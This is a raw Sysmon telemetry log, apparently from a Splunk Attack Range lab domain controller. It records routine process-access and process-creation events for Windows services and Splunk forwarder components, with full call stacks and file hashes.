15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C7B-5FA1-6B00-000000008801}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7B-5FA1-6B00-000000008801}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.948{D28789B6-7C7B-5FA1-6B00-000000008801}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7D-5FA1-6D00-000000008801}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C7D-5FA1-6D00-000000008801}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.847{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7D-5FA1-6D00-000000008801}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.665{D28789B6-7C7D-5FA1-6D00-000000008801}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:25.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7C-5FA1-6C00-000000008801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 